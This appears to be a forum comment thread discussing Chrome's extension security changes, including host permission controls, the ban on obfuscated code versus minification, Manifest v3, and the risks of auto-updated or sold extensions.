Chrome’s auto-update forces you to trust the author of any extension you install for as long as you use the extension. Google’s “Trustworthy by default” effort doesn’t change this model since it still provides no guarantees. This works for some extensions backed by companies (e.g. Adblock), but it doesn’t work for extensions that add simple functionality.
For small extensions that add basic browser functionality (e.g. reorder tabs, enable autocomplete), I wish Google would enable users to verify open-source extensions. I trust the version of the code that I have reviewed on github. I do not trust that the kid who wrote this extension won’t go rogue and upload a malicious version in a future autoupdated release. So the only way I can verify the code that I run is to install it from the Chrome Web Store, copy the code and verify it, uninstall the Chrome Web Store version, and then load the unpacked extension (or even publish my own copy of it to the Chrome Web Store). This is pretty cumbersome.
Chrome's auto-update forces you to trust the author of an extension until it requests more permissions, at which point the extension is automatically disabled and the user is prompted to accept the new permissions to re-enable the extension.
Making the permissions as fine-grained as possible - as google is doing here - is a good way to prevent an extension from becoming malicious in the future.
The solution to that is to only request extensions when they're needed, and to give users prominent options to grant access "only once" or to revoke access (both of which should be undetectable from extensions without extra work).
This isn't perfect, but it comes with some advantages. It's more work for an extension author to check for the permissions than to just write their application logic normally. This means that the lazy authors start coding their apps correctly (just try to do the thing and let the OS handle asking for permission), and only the malicious authors are left nagging for permissions early.
If you have more legitimate than malicious app on your platform, you can at least sort of train some users to think what the malicious apps are doing is weird. If most of your apps don't ask for permissions up front, then the ones who do start to look weirder.
If I go to a website, and a permission pops up asking to access my webcam, and I didn't do something to make that permission pop up... that is really weird and I'm going to click 'no'. And when I click no, if the website wants to be cranky about it, they have to write extra code to hide whatever content is already loaded and pop up a dialog complaining. If I click OK and then immediately click a button and revoke that permission, they need to have even more code continually running in the background to detect it.
Again, it's not hard for a malicious extension/app to do that, it's just that only the malicious extensions/apps are going to do that. So it becomes easier to educate users with simple rules like, "if a site asks for a permission that's unrelated to what you're doing, always say no." It also becomes easier for users who are already careful about permissions to be paranoid and grant them carefully, because they don't have to decide up-front whether the app is worth installing -- they can decide later on whether or not they trust it to have access to something.
Part of having fine-grained permissions is in getting rid of what I call the Terms of Service version, where you just stick anything you might ever want inside of a manifest and then users either accept everything or the app doesn't install.
> Again, it's not hard for a malicious extension/app to do that, it's just that only the malicious extensions/apps are going to do that. So it becomes easier to educate users with simple rules like, "if a site asks for a permission that's unrelated to what you're doing, always say no."
Are you sure it's this simple? Adblockers and password managers for example require wide ranging permissions to work and there's plenty of popular extensions in the same situation.
Password managers don't need extensive permissions, they just need a built-in autofill API. Similarly, you could implement a basic adblocker via a declarative content blocking API.
Fine-grained permissions will allow for this sort of thing.
Does that cover the functionality of most popular extensions though? When there's an API that matches up with the purpose of the extension, it's more straightforward. I would have thought the popularity of those particular example extensions is what partially drove the creation of those APIs as well.
The APIs I mentioned in my previous comment don't exist yet. My point is that Google is going to need to _build_ APIs to fulfill all of the most common use cases (including those ones) in order to succeed in their goal of making extension permissions more fine-grained.
So yes, the functionality of most popular extensions will be covered by the new APIs, because Google will designing the new APIs with those popular extensions in mind.
It does, and many extensions on the store already request huge blanket permission sets they don't need. The UI flow for requesting a new permission with an update is awful to the point that many users never even notice it, so you really should just request every possible permission when you first release your extension.
They need to fix the UX here and it doesn't seem like they intend to.
I think most vigilante extensions arise from malicious players buying popular extensions and then uploading nefarious new versions. In other words, the original authors do not necessarily have incentive to request as many permissions as possible.
This is also a good point. There's the related problem of the extension author selling the extension to a shady company for some extra bucks, who then pushes out an auto-installing update bundling it with malware/adware.
You are not the majority of users though that have the ability to check extensions code to vet them. That would be a huge feature ask for small number of users and I bet you would suffer from review fatigue reading all updates to all extensions. This was the problem with many grease monkey scripts and why addons/extensions are king.
You cannot read all the code of all the extensions you use, and if you are 'regular user', you shouldn't, but you trust some power users, researchers, developers who read the code of particular version of particular extension.
All that is needed is some infrastructure for that. You could even tune the percentage of people you trust who audited the new version of extension to mark it automatically updated for you.
That's not actually have to be anonymous audit process, most of the people in security industry have names, and you know, they actually use extensions too, so they usually read the code anyway. All we need is the checkbox where they could 'ack' the extension.
To get the arrangement you describe would require Google to voluntarily give up some of its current control over Chrome (or for Chrome users to switch to another browser).
So if you can't ask the downloader to verify the code, and extension developers can put almost whatever they want on your browser, what are you supposed to do? Just trust randoms to not infect your computer intentionally or neglectfully?
Unless there's another option, I agree with the OP of this thread. Not allowing a 'locked dependency' type of mechanism for extensions continues to be very dangerous.
Alternate idea: Google can take responsibility for software they are distributing in a more serious manner.
One thing you can do to mitigate risk is to disable any extension you aren't actively using day to day and only turn them on when you need them. If an extension goes rogue it will then hopefully be detected before you activate it again.
The process you described feels like it could be handled with some automation...at least the cumbersome parts. Could even version control what you've verified in your own repo.
Now that modern operating systems come bundled with antivirus and complicated kernel security techniques and most-of-all, because the Web is winning and most of our computer interaction is through a web browser, browser extensions are a prime place for malware to enter someone's PC. Both Mozilla and Google have not given it enough attention. It's good to see this taking place. I can understand the concerns about walled gardens and so on, but I think that's just a pill that you have to swallow. If you want to use a self-loaded extension, that's still available and you'll always be able to find a chromium build that does that if it's very important to you. For most people, it's not a big concern.
All that being said, there's still so much that Chrome needs to fix when it comes to extensions. Extension updates are done in a very opaque way. Extensions that alter network requests have precedence based on their install order --- and there's no clean way for two extensions to really coordinate between each other. This means that HTTPS Everywhere and Decentraleyes and uBlock conflict with one another, and the solution might be to uninstall and reinstall them in a different order. That is clearly insanity. What happens when you login to Chrome on a new machine and your extensions are pulled in, is the install order guaranteed to match your previous machine?
There's also no centralized storage for extensions, which means that settings are generally going to be completely different between machines unless the extension implements its own syncing/backup code.
There's also no way to disable an extension on one machine without disabling it on another machine. That means that if you want an app on your Chromebook, it's gotta be on your desktop as well.
> browser extensions are a prime place for malware to enter someone's PC. Both Mozilla and Google have not given it enough attention.
Well Firefox has switched to webextensions for security reasons and they received a lot of flak because of it. So I'd say the opposite, since Mozilla pushed this hard and still working on better support.
> there's no clean way for two extensions to really coordinate between each other
I don't think something like this should be allowed, could be abused. Instead browsers should embrace the fact that they've become operating systems inside operating systems and implement some of the most used extensions natively.
I completely agree about extensions setting sync tho, it's major pita across all browsers not just chrome.
While fine-grained extension sync isn't an option in Chrome, it's certainly possible to run different extensions on different machines using the same Google login - simply disable the extension sync once you have your "basic" set of extensions.
Centralized storage is an optional but fully functional API in Chrome extensions. Many extensions simply opt not to use it for whatever reasons. (I'm not sure if the storage synchronizing also gets disabled by disabling the syncing of extensions. This should be made more clear, along with fine-grained extension synchronization.)
But yes, there needs to be some kind of solution to the install order issue of the network request API. I don't know why this hasn't been addressed yet.
This is great. Extensions have long been a weak point in the web security model, since many extensions currently require what is essentially the web equivalent of root privileges (UXSS) in order to function. It's good to see Google finally doing something to try to remedy this.
I'm not sure how much this will help to be honest. I haven't looked into the stats for this, but a huge number of popular and useful extensions require access to reading/writing data to all domains to function so users just get used to this being a standard permission they have to allow.
One tip I suggest though: Create one locked down profile in Chrome that you use for email, banking etc. and a separate profile that you can be less careful about installing extension in. Extensions in the second profile won't have access to your browsing activity in the first profile. I have a profile I use for web development for example which I install lots of extensions to that require access to everything.
The new user controls are just a temporary stopgap measure. The real solution Google is working towards is Manifest v3, which will be designed as a much better system with fine-grained permissions.
If Google follows the model with Chrome that they did Android, UXSS permissions will eventually be phased out over time and replaced with better, more secure, opt-in, purpose-built APIs in Chrome. (Assuming they can do that without sacrificing _too_ much functionality.)
Almost nobody makes well thought out decisions when agreeing to permissions during the extension install process.
EULAs, Terms of Service, Mobile Apps, Cookie Consents have boy-who-cried-wolf'ed everyone except the most paranoid and tech-savvy to the point that they are mostly ignored.
Stop taking away people's locks just because other people don't use them.
Yes, many non-technical users do not pay attention to permissions. But permissions are extremely helpful to people who do use them -- and the number of people who do use them is larger than the number of people who audit source code or set up VMs.
Educating normal users to pay attention to permissions is a problem. It is a separate problem than, "do they even have tools in the first place if they want to use them." The problem I want solved is how I verify that an extension is safe. Granular extension permissions solves that problem for people like me.
After that problem is solved, then I can worry about educating my friends and family.
It would nice too if the user was put first and foremost and the user had to give each fine-grained permission approval before it could be used for the first time. And if the user denied any of those permissions the app would continue to function, (either because it's a requirement for being listed in the store, and/or because the framework sends randomized data to the app on the users behalf).
Yes, this is how Android and the Web in general handle permissions. I haven't yet seen what Google is planning for Manifest v3, but I suspect it will use a permissions system built around a similar model, with users getting explicit opt-in prompts for each permission the extension requires. (Though I'm not 100% sure of that yet, it's possible that sort of permissions system might not be practical for browser extensions for reasons I haven't anticipated.)
"Starting today, Chrome Web Store will no longer allow extensions with obfuscated code...Ordinary minification, on the other hand, typically speeds up code execution as it reduces code size, and is much more straightforward to review. Thus, minification will still be allowed"
I have a Chrome extension that uses Webpack to convert TypeScript to JavaScript which then uses UglifyJS to minify it. If I submit only the minified code, is this compliant?
On Firefox the reviewer took my source code, inc package.json, and ran it through the exact same version of my dependencies and then did a checksum of the output against what I submitted. The reviewer also read my source code and reviewed all dependencies.
It was a pain to get through but doing good things for your users takes effort.
Is it correct that Firefox makes your extension live in a short time after you upload it as long as you pass some automated checks? But it can get taken down if it fails the review performed by a human later?
Yes, they're not banning minified code, only obfuscated code. Read a bit further:
> Ordinary minification, on the other hand, typically speeds up code execution as it reduces code size, and is much more straightforward to review. Thus, minification will still be allowed
It's not clear to me where the line between obfuscation and minification is here. Minification is a form of obfuscation. Transpilation and minification also make code significantly harder to review compared to the original code so I'm not following the rational behind this.
Minification is typically referred to "the minimum amount of code changes needed to make code as small as possible".
Obfuscation is more like the maximum amount of code changes possible while keeping semantics.
Writing an unminifier is pretty feasible and the only real trouble with reading the resulting code is the meaningless variable names. Writing a deobfuscator is intentionally hard.
Why "minimum amount of code changes"? I would have thought the goal of minification would be to make the code as small as possible even if it requires a lot of changes.
> Writing an unminifier is pretty feasible and the only real trouble with reading the resulting code is the meaningless variable names.
Reviewing code with meaningless variable names is still several orders of magnitude harder than reviewing the original code though. I agree code though an obfuscater is another step up however.
A minifier will not make changes that are not required. In fact a lot of the more obscure changes can still be easily detected by code and reversed. Eg most minifiers will turn
if(hello) {
alert("hi");
}
into
hello&&alert("hi");
That seems cryptic to the untrained reader. But you can probably imagine writing an unminifier that can detect that the result of that expression is not assigned to anything and that the && is only used for lazy evaluation. This means that you could restore the original "if". Now note that the only reason you can do this is because minifiers follow this same pattern all the time. Every if with a small body is minified in this same way. Unminifiers know the patterns that minifiers use and reverse them where possible. It's pretty fun to do actually.
An obfuscator, on the other side, will try to vary the patterns by which code is changed as much as possible, and as randomly as possible. Depending on a random seed, the same if might be turned into
var b=52,w="toString",h=History;
(((hello==(b-51))||(!b))&&(()=>alert(h[w].call(h).substr(9,2)))())
This is a lot harder to turn back into that if, and essentially impossible for reviewers to follow. A good static analysis tool could probably do some flow analysis and derive that hello is checked for truthiness, the !b check is superfluous and the function expression is immediately invoked, and still restore that if. But real decent obfuscators can do similar static analysis and have access to much more data, by definition (especially if the input code is typed). Eg it would use existing variables in scope that it knows are truthy/falsy/etc and needlessly add them to checks (maybe even bring them into scope from elsewhere). The more code you have, the better you can obfuscate it. Writing a good obfuscator is hard (writing a shitty one is peanuts and a lot of fun), but writing a useful deobfuscator that can handle non-shitty obfuscators is nearly impossible.
> Reviewing code with meaningless variable names is still several orders of magnitude harder than reviewing the original code though.
Automated checking tools don't really care about human-friendly user functions' names. They will however check for calls to dangerous APIs (eg: XMLHttpRequest(url), eval(stuff) ) and some dangerous patterns (eg: background actions unprompted by the user ).
>Why "minimum amount of code changes"? I would have thought the goal of minification would be to make the code as small as possible even if it requires a lot of changes.
You're agreeing. Minification makes things as small as possible. No one said otherwise. The "minimum amount of code changes" could very well be "a lot of changes".
The difference is whether your goal is to make the code impossible to reverse engineer, or if you're just trying to reduce the size or improve the performance of the final deliverable.
The blog post explicitly calls out all of the following techniques as acceptable, for example:
> * Removal of whitespace, newlines, code comments, and block delimiters
I read the post but seeing as the penalty for not following the guidelines is your extension being removed from the store and not all minifiers work the same way I thought some clarification would help.
This seems like a great effort. However, I worry what this means for the future of WebAssembly inside of extensions. There's an undeniable advantage to being able to write extensions in languages other than JavaScript. AgileBits has been writing the 1Password X extension, in Go, compiled to JS. While the JS isn't obfuscated per-se, it's also not very readable.
I hope they can find a path forward that doesn't kill off extensions like 1Password X.
I think some more granularity in permissions wrt how extensions may change websites would be useful too.
For example, it would be easy for Google/Mozilla/etc to compile a list of HTML tags and attributes that can never be used to inject javascript. Lots of "HTML sanitization" libraries do this, for instance. Then, we could get permissions like "remove content", "inject non-interactive content" and "inject interactive content". An ad blocker, for instance, should work with no network access whatsoever and should never need to inject code. So I can totally lock it down to not being able to do anything except replace ads by empty <div> tags.
I think there's an opportunity for browser builders here with more granular permissions in other areas too (eg "network access but only to domains x and y", which ofc only makes sense if you can't also inject arbitrary interactive content but ok). No user is of course ever going to read those, or understand which combination of permissions make sense, but a Google reviewer can. Then the reviewer doesn't need to review anymore whether the code does something bad, but only whether the requested permissions would _allow_ the code to do something bad an whether the permissions make sense for what the extension is supposed to be doing.
Eg LastPass ought to work just fine with only "access to *.lastpass.com" plus "inject only non-interactive content".
This could be particularly powerful if browser designers would create a way for extensions to show possibly-interactive content on the top/left/side/bottom of the page (in a popover bar for instance) that is clearly not part of the page DOM. Then, LastPass can remove their "click to auto-fill" icons inside user/pass forms and replace them by a "That looks like a login form. Do you want to auto-login?" popover bar with an ok button. The UX is still great, security is greatly improved.
I don't pretend to be smarter than the teams that build browsers, so I may be missing something. Nevertheless right now I think that this, combined with the feature announced in this post where extensions can be locked down to specific websites, will remove the need for nearly any "can change anything on any website and do anything with it" extensions (which are pretty much the norm right now). Gmail extension? Website-specific. Pinterest "pin it" button? Non-interactive (make the injected button just be a selector and show the final "pin selected images" action in a popover bar). HN-Submit? Non-interactive. And so on.
A lot of that functionality is already possible through Declarative Content[1] and Optional Permissions[2]. These remove the need for extensions to have permissions to all websites, while enabling them to be given permission to a site after installation. However, these features weren't part of the original APIs, so I think a lot of extension developers aren't familiar with them, don't want to refactor their existing codebases to support these features, or are targeting multiple browsers where other browsers don't support this functionality.
Overall this looks great, but I wonder whether extensions will be allowed that are written in compiled languages? Dart, Go (via Gopher), Kotlin, and so on? Is Webassembly supported?
Can't answer whether they will, but in theory they could. Allow devs to upload their source, then using reproducible builds and/or cloud builds, verify that the supplied source compiles down to the submitted binary.
So by default Chrome extensions will still be able to access any domain they've asked for permission to in their manifest (which can include all domains) but users can optional restrict this? Is this really going to help non-technical users much?
Not at first. The real benefit to non-technical users will come once Google starts using this system to pressure extension developers to migrate to newer APIs with more limited permissions.
Right now, as you say, only power users will use this feature. But once suitable alternative permissions are available for the more common use cases, Google will start to transition to "When you click the extension" as the default setting, which will put pressure on affected extension developers to migrate to the new permissions systems to avoid unnecessary friction for their users.
My question is how is this activated? I fear that it will be based on a left click of the extensions icon which is normally used for popup.html, if it's a right click the issue is alleviated.
Any updates like these are appreciated since I've all but stopped using extensions, and would like starting using them again one day. I don't think the current system with messages in the UI like "read/change all data on all sites you visit" is acceptable in the current 2018 environment. I feel like a default-deny-all policy and a (user friendly) way to review what data/urls an extension is accessing is needed. There currently is too much trust involved, and it seems like it shouldn't be needed. One idea is for chrome to provide the extension with a sandboxed, virtual dom api that doesn't pass any user identifiable data. The extension registers with chrome the functionality it provides, like "fill the main password field with this string", and chrome executes that action internally. It can never request user/history/etc data, just provide functionality to a black box.
Can someone explain to me why it isn't possible to simply give users the option to influence whether an extension can make a request to a remote server?
This way one could simply disallow extensions to do anything that isn't happeninging locally.
It's trickier than it seems. To take just one example, suppose you have an extension that modifies pages to insert a related link (e.g. an extension that tries to infer a hacker news user's reddit account and link to it from their HN profile page).
The extension needs permission to modify documents on the hacker news domain. But if it can insert an <a> tag, what's to stop it from inserting an invisible <img href> tag, which could be used to exfiltrate data? Or even just inserting an <a> tag with an onClick handler, or a javascript: url?
Right - or even trickier... Imagine Google manages to block extensions from inserting <img> tags that reference other domains as a way of exfiltrating data... There are so many other ways to do it:
Say you have an extension that ONLY wants access to mail.google.com. It might feel safer because it can't load in any third party scripts. But it can just as easily SEND data from your account as an email which it promptly deletes.
Same goes for LinkedIn, Facebook, HN, any interactive website can be used to exfiltrate data.
When an extension has the ability to inject arbitrary JS into a page, it's not easy to determine whether any given request is being triggered by the host page or by the extension.
One thing that I'd like to see is mandatory code signing, so that even in the event of a compromised developer account it's not possible for an update to be pushed out unless the attacker also has the signing key.
Ad blockers will continue to function as they currently do. However, users may need to explicitly allow the ad blockers whitelisted access to all hosts if this feature is implemented with default-deny.
I would like to know more about the review methodology and when the review is triggered. If I ask for wide permissions, get them, and then sell my extension to a malicious third party, what triggers the review?
I like the host access restriction policy they describe. I update and fix existing extensions for customers and about 90% of the time the previous author has added necessary permissions and access to URLs.
For context, I have an extension designed for a single html5 game, with roughly ~80k weekly active users. I've been using the chrome web store to deploy and update it for about 2 years, and recently wrote my own installer after Google stopped me from issuing security updates for over a month. I also had to build my own configuration update system to enable me to disable features on an hour's notice due to the security update incident & Chrome taking over a day to install updates - I'm serving about 3GB of configuration and update data per day right now, at around 1kb/user/hr.
Lots of functionality (and thus current extensions) requires requesting blanket access to all websites so they have a big task ahead of them trying to get all those extensions to comply.
In general the way things work for Chrome Extensions right now is bad for users and downright hostile to developers. Because I actually followed best practices on extension permissions I got a lot of confused, paranoid users, and had to explain Google's awful permissions model and UI in detail: https://www.reddit.com/r/Granblue_en/comments/86bdmo/psa_vir...
If I had simply requested a large set of blanket permissions when I first created the extension, I would've saved myself a huge amount of effort.
Users having the choice to scope wildcards down to specific pages is a start but until it's a default it isn't really a meaningful improvement for anyone because few people are qualified to actually set those restrictions properly. The design of the extension API itself tends to require wildcards to provide functionality due to limitations in the other APIs. For example, if you want to do anything fancy with web requests and do it performantly, you may need to inject JS directly into webpages - the background-page-based webRequest API is slow and missing key features.
There's also a risk here that by trying to kludge better access controls into the existing full-of-holes extension model, Google is going to break tons of extensions that ordinary users rely on and they're going to be too frustrated by this to be happy about any security upside.
Some genuinely good changes though:
* Requiring 2FA to deploy extension updates. This is a big vulnerability in the existing system, especially if an extension has many users. It's been exploited in the past.
* Service worker support (probably) - the current model with page/content/background scripts and popup pages is a nightmare both to author and debug, hopefully service workers will provide a better way to architect all of this.
* Narrowly scoped declarative APIs - hopefully this means extension developers can finally get access to smaller features without having to request access to the entire universe. Some of the feature scoping is really absurd and occasionally unrelated APIs are tucked under a larger permission in a way that really confuses users. As I explained to users in my old reddit comment above, Google currently uses "Access your browsing history" to describe an ENORMOUS set of unrelated features.
* Blocking obfuscated JS - this literally will do nothing to protect users, but it's worth denying it anyway. There's no good reason to obfuscate extension JS since it's so hard to debug extensions you didn't write anyway. It's possible this will make it easier for them to apply machine learning to identify malicious extension code, at least, but I bet the machine learning will just randomly reject updates to legitimate extensions without any explanation and you'll be screwed.
The big wildcard here is Google's history of failing to maintain or properly document extension APIs. They're going to be rearranging lots of existing stuff and adding new stuff, so the underlying mess will probably become 10x worse. Core APIs like notifications have been entirely or partially broken for years with no effort made to fix them or update docs. Inertia is one of the main things carrying the chrome extension ecosystem forward and it's possible many extension developers will churn out after they find the migration effort involved here too much, similar to how Firefox lost many extensions during their two transitions (old->multiprocess compatible->webextensions)
Reposting this comment as I think it’s relevant at the top level.
On Firefox the reviewer took my source code, inc package.json, and ran it through the exact same version of my dependencies and then did a checksum of the output against what I submitted. The reviewer also read my source code and reviewed all dependencies.
It was a pain to get through but doing good things for your users takes effort.
For small extensions that add basic browser functionality (e.g. reorder tabs, enable autocomplete), I wish Google would enable users to verify open-source extensions. I trust the version of the code that I have reviewed on github. I do not trust that the kid who wrote this extension won’t go rogue and upload a malicious version in a future autoupdated release. So the only way I can verify the code that I run is to install it from the Chrome Web Store, copy the code and verify it, uninstall the Chrome Web Store version, and then load the unpacked extension (or even publish my own copy of it to the Chrome Web Store). This is pretty cumbersome.